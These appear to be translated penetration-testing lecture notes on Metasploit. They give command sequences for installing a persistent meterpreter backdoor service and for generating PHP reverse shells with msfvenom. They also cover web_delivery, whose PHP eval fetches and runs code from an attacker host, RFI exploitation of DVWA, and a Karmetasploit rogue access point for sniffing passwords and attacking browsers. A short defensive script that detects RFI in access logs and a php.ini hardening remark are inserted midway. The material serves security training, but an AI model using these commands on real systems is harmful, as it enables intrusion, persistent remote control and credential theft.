Persistent backdoors
○ A meterpreter shell obtained by exploiting a vulnerability runs only in memory and is lost on reboot
○ Re-exploiting the vulnerability may crash the service
○ A persistent backdoor keeps remote control even after the vulnerability is patched
Meterpreter backdoor
run metsvc -A    # use -r instead to remove the service
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1
Extended MSF usage
PHP shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
○ Start a listener in MSF
○ Upload to the web site and open it in a browser
Web Delivery
○ Use a code-execution vulnerability to make the target fetch and run code from the attacker's server
use exploit/multi/script/web_delivery
set target 1
php -d allow_url_fopen=true -r
"eval(file_get_contents('http://1.1.1.1/fTYWqmu'));"
RFI (remote file inclusion)
vi /etc/php5/cgi/php.ini
allow_url_fopen = On
allow_url_include = On
use exploit/unix/webapp/php_include
set RHOST 1.1.1.2
set PATH /dvwa/vulnerabilities/fi/
set PHPURL /?page=XXpathXX
set HEADERS "Cookie:security=low; PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
set payload php/meterpreter/reverse_tcp
set lhost 1.1.1.1
exploit
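From the defender's side, the php_include module above shows up in the web server's access log as an include parameter whose value is a URL or PHP stream wrapper instead of a local page name. The following added example (not part of these notes or of Metasploit) scans constructed Apache-style log lines for that pattern; the parameter names in INCLUDE_PARAMS and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not taken from the original notes).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1532
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://1.1.1.1/a.php HTTP/1.1" 200 4011
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /dvwa/vulnerabilities/fi/?page=%2568ttp%253A%252F%252F1.1.1.1%252Fb.txt HTTP/1.1" 200 4011
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /dvwa/vulnerabilities/fi/?page=php://input HTTP/1.1" 200 12
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 900
"""

# Common log format: client IP, two "-" fields, [timestamp], "METHOD URL PROTO".
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*"'
)
# Schemes and PHP stream wrappers that make include() pull in non-local content.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp|php|data|expect)://', re.IGNORECASE)
# Parameter names typically passed to include()/require() (assumption; adjust per app).
INCLUDE_PARAMS = {"page", "file", "include", "path", "template"}


def decode_again(value):
    """parse_qsl already removed one layer of %-encoding; strip a second layer
    so double-encoded values such as %2568ttp are still recognised."""
    return unquote(value).strip()


def find_rfi_attempts(log_text):
    """Return (client_ip, param, decoded_value) for every request whose include
    parameter names a remote URL or stream wrapper."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        query = urlsplit(m.group("url")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = decode_again(value)
            if name.lower() in INCLUDE_PARAMS and REMOTE_SCHEME_RE.match(decoded):
                hits.append((m.group("ip"), name, decoded))
    return hits


if __name__ == "__main__":
    for ip, param, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"possible RFI from {ip}: {param}={value}")
```

The same check applied to the php.ini keys above (allow_url_fopen / allow_url_include set to Off) removes the condition the module relies on.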
Karmetasploit
○ Fake AP, password sniffing, data interception, browser attacks
wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
○ Install the remaining dependencies
gem install activerecord sqlite3-ruby
Infrastructure installation and configuration
apt-get install isc-dhcp-server
cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
Fake AP
airmon-ng start wlan0
airbase-ng -P -C 30 -e "FREE" -v wlan0mon
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
touch /var/lib/dhcp/dhcpd.leases
dhcpd -cf /etc/dhcp/dhcpd.conf at0
Start Karmetasploit
msfconsole -q -r karma.rc_.txt
Letting users browse the internet normally
○ vi karma.rc_.txt
○ Remove the setg parameters
○ Add browser_autopwn2 and other modules
○ Check for malicious traffic: auxiliary/vsploit/malware/dns*
○ Start Karmetasploit again
Add routing and firewall rules
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE